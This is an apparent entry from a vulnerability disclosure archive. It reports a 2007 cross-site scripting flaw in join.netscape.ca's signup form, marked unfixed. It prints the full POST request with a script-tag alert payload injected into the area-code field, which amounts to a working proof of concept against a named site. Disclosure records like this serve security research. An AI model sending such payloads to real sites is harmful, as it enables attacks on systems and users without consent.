Security researcher Uber0n, has submitted on 14/12/2007 a cross-site-scripting (XSS) vulnerability affecting join.netscape.ca, which at the time of submission ranked 191623 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/12/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 14/12/2007 |
Date published: 16/12/2007 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: Uber0n |
Domain: join.netscape.ca |
Category: XSS |
Pagerank: 191623 |
|---|
| URL: https://join.netscape.ca/signup.php?nolhc=en_CA&rg=1 |
| POST: locareacode=">'><ScRiPt>alert(123)</sCrIpT>"'&locphonenxx=&locphonenum=&Number=&locdosearch=&tos=on& x=47&y=28&PROMO_CODE=1557103&opc=&page_from=1&ftv=loc_areacode%2Cloc_phonenxx%2Cloc_phonenum%2Cloc_a ccessNumber%2Cloc_dosearch%2Ctos&do=submit&Province=&LocCity=&plan=AccOnline&FirstName=&LastName=&Ad dress1=&Address2=&City=&OFFICE=&Zip_1=&Zip_2=&Zip=&Country=CA&Phone1=&Phone2=&Phone3=&Phone=&QUESTIO N=&ANSWER=&FORWARD=&hear_newspaper=&hear_magazine=&hear_radio=&hear_banner=&hear_other=&hear_other_t ext=&hear_netscape=&hear_friend=&hear_pressstory=&hear_specialoffer=&securityservices=&ACCOUNT=&paym entoption=&CardType=&CardNumber=&CardHolder=&ExpMonth=&ExpYear=&AGREE_DD=&initialtransit=&BANK_ACCOU NT=&Email1=&Email2=&PASSWORD=&ServicePlan=AccOnline&ROUTING_NO=&BANK=Default&PaymentPlan=1&PAYTYPE=& State=&TRANSIT_NO=&EDATE=&homehardwarestore= |
|
Click here to view the mirror
|
|
|
| 
